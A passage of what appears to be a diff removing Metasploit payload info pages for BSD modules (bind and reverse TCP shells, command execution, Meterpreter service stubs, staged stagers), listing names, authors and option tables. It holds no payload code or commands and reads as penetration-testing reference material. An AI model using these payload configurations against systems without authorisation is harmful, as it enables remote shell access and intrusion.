HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD Command Shell, Bind TCP Inline
Module: payload/bsd/sparc/shell_bind_tcp
Platform: BSD
Arch: sparc
Needs Admin: No
Total size: 164
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,45 +0,0 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/sparc/shell_reverse_tcp
Platform: BSD
Arch: sparc
Needs Admin: No
Total size: 128
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/vax/shell_reverse_tcp
Platform: BSD
Arch: vax
Needs Admin: No
Total size: 100
Rank: Normal
Provided by:
wvu <wvu@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
-33
View File
@@ -1,33 +0,0 @@
Name: BSD x64 Execute Command
Module: payload/bsd/x64/exec
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 23
Rank: Normal
Provided by:
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
Description:
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD x64 Command Shell, Bind TCP Inline (IPv6)
Module: payload/bsd/x64/shell_bind_ipv6_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 90
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,40 +0,0 @@
Name: BSD x64 Shell Bind TCP
Module: payload/bsd/x64/shell_bind_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 136
Rank: Normal
Provided by:
nemo <nemo@felinemenace.org>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Bind an arbitrary command to an arbitrary port
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD x64 Command Shell, Bind TCP Inline
Module: payload/bsd/x64/shell_bind_tcp_small
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 88
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,46 +0,0 @@
Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Module: payload/bsd/x64/shell_reverse_ipv6_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Connect back to attacker and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,47 +0,0 @@
Name: BSD x64 Shell Reverse TCP
Module: payload/bsd/x64/shell_reverse_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 98
Rank: Normal
Provided by:
nemo <nemo@felinemenace.org>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,45 +0,0 @@
Name: BSD x64 Command Shell, Reverse TCP Inline
Module: payload/bsd/x64/shell_reverse_tcp_small
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 81
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
-35
View File
@@ -1,35 +0,0 @@
Name: BSD Execute Command
Module: payload/bsd/x86/exec
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 16
Rank: Normal
Provided by:
snagg <snagg@openssl.it>
argp <argp@census-labs.com>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
Description:
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,49 +0,0 @@
Name: FreeBSD Meterpreter Service, Bind TCP
Module: payload/bsd/x86/metsvc_bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Stub payload for interacting with a Meterpreter Service
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,56 +0,0 @@
Name: FreeBSD Meterpreter Service, Reverse TCP Inline
Module: payload/bsd/x86/metsvc_reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Stub payload for interacting with a Meterpreter Service
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,45 +0,0 @@
Name: BSD Command Shell, Bind TCP Stager (IPv6)
Module: payload/bsd/x86/shell/bind_ipv6_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 63
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,43 +0,0 @@
Name: BSD Command Shell, Bind TCP Stager
Module: payload/bsd/x86/shell/bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 54
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD Command Shell, Find Tag Stager
Module: payload/bsd/x86/shell/find_tag
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 40
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Description:
Spawn a command shell (staged).
Use an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
TAG qFGA yes The four byte tag to signify the connection.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,53 +0,0 @@
Name: BSD Command Shell, Reverse TCP Stager (IPv6)
Module: payload/bsd/x86/shell/reverse_ipv6_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 81
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Spawn a command shell (staged).
Connect back to the attacker over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,50 +0,0 @@
Name: BSD Command Shell, Reverse TCP Stager
Module: payload/bsd/x86/shell/reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 43
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,38 +0,0 @@
Name: BSD Command Shell, Bind TCP Inline
Module: payload/bsd/x86/shell_bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 73
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
